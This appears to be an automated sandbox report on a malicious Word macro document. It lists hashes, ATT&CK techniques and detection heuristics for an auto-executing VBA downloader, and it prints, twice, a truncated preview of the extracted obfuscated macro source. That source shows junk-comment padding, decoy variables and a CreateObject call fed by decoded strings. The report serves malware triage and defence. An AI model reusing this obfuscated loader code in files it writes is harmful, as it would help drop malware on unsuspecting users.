Office (OLE) malware analysis — malicious · 3965c5327e4e062d

MALICIOUS

Office (OLE)

152.3 KB Created: 2019-10-24 11:44:00 Authoring application: Microsoft Office Word First seen: 2020-09-24

MD5: 114218cc0cda4bc9d777ad1554cb1392 SHA-1: 3183122de7f4034796f73c3011efb825ce928e00 SHA-256: 3965c5327e4e062d2a2786b689644741b4aaace1fa09ebda27313bd56e69ee6b

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The macros utilize CreateObject and appear to be an auto-executing loader, as indicated by multiple high and critical heuristic firings. The primary function of the script is to download and execute a second-stage payload, a common technique for malware droppers. The specific payload and its ultimate destination are not discernible from the provided evidence.

Heuristics 8

ClamAV: Doc.Downloader.Generic-7355718-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-7355718-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 39744 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	39744 bytes
SHA-256: `9f46c933089512226b2b7ed2f649446d654c8ef684ca164be73815121fa6550a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Ofklqscrz" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "Plkcvxytn, 0, 0, MSForms, CommandButton" Attribute VB_Control = "Sbbyxphpqfqlx, 1, 1, MSForms, CommandButton" Attribute VB_Control = "Bgqsexptojse, 2, 2, MSForms, CommandButton" Attribute VB_Control = "Dafffhul, 3, 3, MSForms, CommandButton" Attribute VB_Control = "Pilpfzpxc, 4, 4, MSForms, CommandButton" Attribute VB_Control = "Lbaeiuqjeug, 5, 5, MSForms, CommandButton" Attribute VB_Control = "Brmwbwaaooau, 6, 6, MSForms, CommandButton" Attribute VB_Control = "Gaaptlhziydlh, 7, 7, MSForms, CommandButton" Attribute VB_Name = "Sjbpdcda" Function qiwhdjkasd(qiwhdjkasdA) On Error Resume Next ''''''Lewandowski - Soltys Apt. 342 Northwest Szulc LLC Apt. 950 North ''''''Kowalewski Group Suite 438 Northeast Bielawski - Graczyk Apt. 902 West Ufrgqxfiopze = Atn("Pizza") Sojfpsjrblenw = Atn(Amrpziyiasj) Iujnfuohgyt = "Bike" ''''''Urbanowicz - Rudzki Apt. 473 North Jezierski - Golebiowski Suite 710 Northwest Degbcbmuo = CStr(661) ''''''Pietrzyk, Gutowski and Pietrzak Suite 792 Northwest Lesniak and Sons Apt. 071 Northeast Ovqtginge = Int(Gbribeftoy) Eubzpibvtrc = CStr(779) ''''''Niewiadomski Inc Suite 552 North Kot, Filipowicz and Czajka Apt. 940 Northeast ''''''Glab - Stanek Suite 479 West Jarzabek, Jarosz and Brzezinski Suite 350 Southwest Evbxkmapuy = Int(Uzipvojedl) Jxydwpoy = Oct(752) ''''''Maslanka - Wilczynski Suite 109 Northeast Kaluza LLC Apt. 320 East Xjevdlkbkwwpv = "Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/531.0.1 (KHTML, like Gecko) Chrome/18.0.812.0 Safari/531.0.1" Gydstgswxomo = Fjgqwbzkakyu ''''''Przybylski, Klos and Kowalik Apt. 681 South Jagiello, Zurek and Lukasiewicz Suite 060 West Chtcpkqr = Tan("214.221.129.97") Zrfmggrwn = Fix(Mpzzhtvxs) Equpukzlcnyaq = "210.232.217.237" ''''''Wojtas Inc Suite 218 Southwest Kolodziej Inc Apt. 502 Southeast Mettbgtwpsudi = Log(731) Set qiwhdjkasd = CreateObject(Mebdmefj(Mebdmefj(qiwhdjkasdA))) ''''''Poplawski Inc Suite 807 Northwest Kucharczyk - Szczygiel Suite 623 North ''''''Wierzbicki Group Apt. 004 South Bukowski - Jurek Apt. 901 East Exmqoypfun = Atn("210.0.101.86") Kffkxjnmiuvl = CSng(Nhqetdsyyrhbt) Hzydmwtsz = "Chips" ''''''Ciszewski, Serafin and Kawa Suite 452 East Bednarek - Stepniak Apt. 830 North Rrdkcatqkh = CLng(455) ''''''Jankowski LLC Apt. 171 East Buczkowski, Smolinski and Rybarczyk Apt. 852 Northeast Ttbmgndwqih = CDate(Wijbuprckmbu) Ghcuysjejlk = CSng(82) ''''''Majka and Sons Suite 653 Northwest Pilch, Bartosik and Olejnik Suite 672 South ''''''Rózanski, Mierzejewski and Drozdowski Suite 360 Northwest Szczepaniak - Marciniak Suite 545 Northwest Vesjjcpfs = Int(Prxnjhassxw) Ojilszyrikv = Tan(894) ''''''Szczepaniak, Mróz and Chojnacki Suite 633 East Budzinski LLC Suite 404 Southwest Crrzkoxneguw = "Hagenes LLCSuite 957West" Ksuhzpfv = Dmslyggcpqei ''''''Szatkowski LLC Apt. 618 Southwest Galazka, Lipinski and Gawronski Suite 050 East Nhrzjcopxxny = CBool("Future40445 Tierra Fall, Annamariemouth, Gabon") Wimhqxvx = Oct(Pxargewcrb) Xflyfopvxzsc = "Ferry GroupApt. 240Southwest" ''''''Wasik, Pawelec and Glowacki Apt. 028 South Marzec and Sons Suite 980 North Exrdxqmfk = Oct(325) End Function Function Ojwcmtqhk() On Error Resume Next ''''''Podgórski - Urbanowicz Apt. 067 East Lesniewski - Szulc Apt. 205 Northeast ''''''Krukowski - Bogucki Suite 687 West Jackowski - Sliwa Apt. 492 Northwest Ykcnutbb = CLng("Tillman - DickiSuite 759Northeast") Vydsjxvlcbkd = Hex(Pxfmufzc) Cqswmgrkdeo = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; .NET CLR 3.3.90691.4)" ''''''Wronski LLC Suite 199 South Bartnik, Nowakowski and Mackowiak Apt. 601 Southwest Oubftgfsv = Hex(64) ''''''Kaczmarek, Malecki and Skiba Apt. 368 West Sowinski - Pietrzak Apt. 862 East ... (truncated)

SHA-256: 9f46c933089512226b2b7ed2f649446d654c8ef684ca164be73815121fa6550a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Ofklqscrz"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Plkcvxytn, 0, 0, MSForms, CommandButton"
Attribute VB_Control = "Sbbyxphpqfqlx, 1, 1, MSForms, CommandButton"
Attribute VB_Control = "Bgqsexptojse, 2, 2, MSForms, CommandButton"
Attribute VB_Control = "Dafffhul, 3, 3, MSForms, CommandButton"
Attribute VB_Control = "Pilpfzpxc, 4, 4, MSForms, CommandButton"
Attribute VB_Control = "Lbaeiuqjeug, 5, 5, MSForms, CommandButton"
Attribute VB_Control = "Brmwbwaaooau, 6, 6, MSForms, CommandButton"
Attribute VB_Control = "Gaaptlhziydlh, 7, 7, MSForms, CommandButton"

Attribute VB_Name = "Sjbpdcda"
Function qiwhdjkasd(qiwhdjkasdA)
On Error Resume Next
   ''''''Lewandowski - Soltys Apt. 342 Northwest Szulc LLC Apt. 950 North
''''''Kowalewski Group Suite 438 Northeast Bielawski - Graczyk Apt. 902 West
Ufrgqxfiopze = Atn("Pizza")
Sojfpsjrblenw = Atn(Amrpziyiasj)
Iujnfuohgyt = "Bike"
''''''Urbanowicz - Rudzki Apt. 473 North Jezierski - Golebiowski Suite 710 Northwest
Degbcbmuo = CStr(661)
''''''Pietrzyk, Gutowski and Pietrzak Suite 792 Northwest Lesniak and Sons Apt. 071 Northeast
Ovqtginge = Int(Gbribeftoy)
Eubzpibvtrc = CStr(779)
''''''Niewiadomski Inc Suite 552 North Kot, Filipowicz and Czajka Apt. 940 Northeast
''''''Glab - Stanek Suite 479 West Jarzabek, Jarosz and Brzezinski Suite 350 Southwest
Evbxkmapuy = Int(Uzipvojedl)
Jxydwpoy = Oct(752)
''''''Maslanka - Wilczynski Suite 109 Northeast Kaluza LLC Apt. 320 East
Xjevdlkbkwwpv = "Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/531.0.1 (KHTML, like Gecko) Chrome/18.0.812.0 Safari/531.0.1"
Gydstgswxomo = Fjgqwbzkakyu
''''''Przybylski, Klos and Kowalik Apt. 681 South Jagiello, Zurek and Lukasiewicz Suite 060 West
Chtcpkqr = Tan("214.221.129.97")
Zrfmggrwn = Fix(Mpzzhtvxs)
Equpukzlcnyaq = "210.232.217.237"
''''''Wojtas Inc Suite 218 Southwest Kolodziej Inc Apt. 502 Southeast
Mettbgtwpsudi = Log(731)
Set qiwhdjkasd = CreateObject(Mebdmefj(Mebdmefj(qiwhdjkasdA)))
   ''''''Poplawski Inc Suite 807 Northwest Kucharczyk - Szczygiel Suite 623 North
''''''Wierzbicki Group Apt. 004 South Bukowski - Jurek Apt. 901 East
Exmqoypfun = Atn("210.0.101.86")
Kffkxjnmiuvl = CSng(Nhqetdsyyrhbt)
Hzydmwtsz = "Chips"
''''''Ciszewski, Serafin and Kawa Suite 452 East Bednarek - Stepniak Apt. 830 North
Rrdkcatqkh = CLng(455)
''''''Jankowski LLC Apt. 171 East Buczkowski, Smolinski and Rybarczyk Apt. 852 Northeast
Ttbmgndwqih = CDate(Wijbuprckmbu)
Ghcuysjejlk = CSng(82)
''''''Majka and Sons Suite 653 Northwest Pilch, Bartosik and Olejnik Suite 672 South
''''''Rózanski, Mierzejewski and Drozdowski Suite 360 Northwest Szczepaniak - Marciniak Suite 545 Northwest
Vesjjcpfs = Int(Prxnjhassxw)
Ojilszyrikv = Tan(894)
''''''Szczepaniak, Mróz and Chojnacki Suite 633 East Budzinski LLC Suite 404 Southwest
Crrzkoxneguw = "Hagenes LLCSuite 957West"
Ksuhzpfv = Dmslyggcpqei
''''''Szatkowski LLC Apt. 618 Southwest Galazka, Lipinski and Gawronski Suite 050 East
Nhrzjcopxxny = CBool("Future40445 Tierra Fall, Annamariemouth, Gabon")
Wimhqxvx = Oct(Pxargewcrb)
Xflyfopvxzsc = "Ferry GroupApt. 240Southwest"
''''''Wasik, Pawelec and Glowacki Apt. 028 South Marzec and Sons Suite 980 North
Exrdxqmfk = Oct(325)
End Function
Function Ojwcmtqhk()
On Error Resume Next
   ''''''Podgórski - Urbanowicz Apt. 067 East Lesniewski - Szulc Apt. 205 Northeast
''''''Krukowski - Bogucki Suite 687 West Jackowski - Sliwa Apt. 492 Northwest
Ykcnutbb = CLng("Tillman - DickiSuite 759Northeast")
Vydsjxvlcbkd = Hex(Pxfmufzc)
Cqswmgrkdeo = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; .NET CLR 3.3.90691.4)"
''''''Wronski LLC Suite 199 South Bartnik, Nowakowski and Mackowiak Apt. 601 Southwest
Oubftgfsv = Hex(64)
''''''Kaczmarek, Malecki and Skiba Apt. 368 West Sowinski - Pietrzak Apt. 862 East

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.